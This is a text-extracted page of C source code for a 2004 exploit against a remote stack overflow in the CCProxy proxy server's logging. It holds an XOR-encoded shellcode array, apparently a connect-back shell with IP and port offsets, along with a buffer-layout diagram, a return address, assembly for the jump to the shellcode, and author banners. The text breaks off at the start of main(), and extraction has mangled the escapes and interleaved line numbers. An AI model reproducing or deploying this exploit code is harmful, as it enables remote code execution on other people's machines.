CCProxy Log Remote Stack Overflow Exploit.pdf

1 #include <stdio.h> 2 #include <windows.h> 3 #include <winsock.h> 4 5 #pragma comment(lib, "ws2_32") 6 7 8 unsigned char EndChar[]= 9 "x20x48x54x54x50x2Fx31x2Ex30x0Dx0Ax0Dx0A"; 10 // HTTP/1.0 11 12 unsigned char shellcode[] = 13 "xebx0ex5bx4bx33xc9xb1xfex80x34x0bxeexe2xfaxebx05" 14 15 "xe8xedxffxffxff" 16 17 /* 254 bytes shellcode, xor with 0xee */ 18 /* offset 92=IP offset 99=PORT*/ 19 "x07x36xeexeexeexb1x8ax4fxdexeexeexeex65xaexe2x65" 20 21 "x9exf2x43x65x86xe6x65x19x84xeaxb7x06x96xeexeexee" 22 23 "x0cx17x86xddxdcxeexeex86x99x9dxdcxb1xbax11xf8x7b" 24 25 "x84xedxb7x06x8exeexeexeex0cx17xbfxbfxbfxbfx84xef" 26 27 "x84xecx11xb8xfex7dx86x91xeexeexefx86xecxeexeexdb" 28 29 "x65x02x84xfexbbxbdx11xb8xfax6bx2ex9bxd6x65x12x84" 30 31 "xfcxb7x45x0cx13x88x29xaaxcaxd2xefxefx7dx45x45x45" 32 33 "x65x12x86x8dx83x8axeex65x02xbex63xa9xfexb9xbexbf" 34 35 "xbfxbfx84xefxbfxbfxbbxbfx11xb8xeax84x11x11xd9x11" 36 37 "xb8xe2x11xb8xf6x11xb8xe6xbfxb8x65x9bxd2x65x9axc0" 38 39 "x96xedx1bxb8x65x98xcexedx1bxddx27xa7xafx43xedx2b" 40 41 "xddx35xe1x50xfexd4x38x9axe6x2fx25xe3xedx34xaex05" 42 43 "x1fxd5xf1x9bx09xb0x65xb0xcaxedx33x88x65xe2xa5x65" 44 45 "xb0xf2xedx33x65xeax65xedx2bx45xb0xb7x2dx06xcdx11" 46 47 "x11x11x60xa0xe0x02x9cx10x5dxf8x01x20x0ex8ex43x37" 48 49 "xebx20x37xe7x1bx43x02x17x44x8ex09x97x28x97"; 50 51 /* 52 Page 1/5 CCProxy Log Remote Stack Overflow Exploit Ruder 11/09/2004 53 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ 54 | |inc edx...inc edx|shellcode|0x7ffa54cd| | | 55 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ 56 +0x42 +shellcode +IPLen( IP )=4065 57 58 : 59 mov ecx,0x12811111 60 shr ecx,0x14 61 sub esp,ecx 62 jmp esp 63 64 65 1. 66 2. ecx inc edx 67 */ 68 69 void start(void) 70 { 71 printf("CCProxy Log Stack Overflow Exploit!n"); 72 printf("written by Ruder 11/2004n"); 73 printf("Bug found by Isno,See xfocus.comn"); 74 printf("Homepage:http://ruder.cdut.netn";); 75 printf("E−mail:cocoruder@163.comn"); 76 } 77 78 int main(int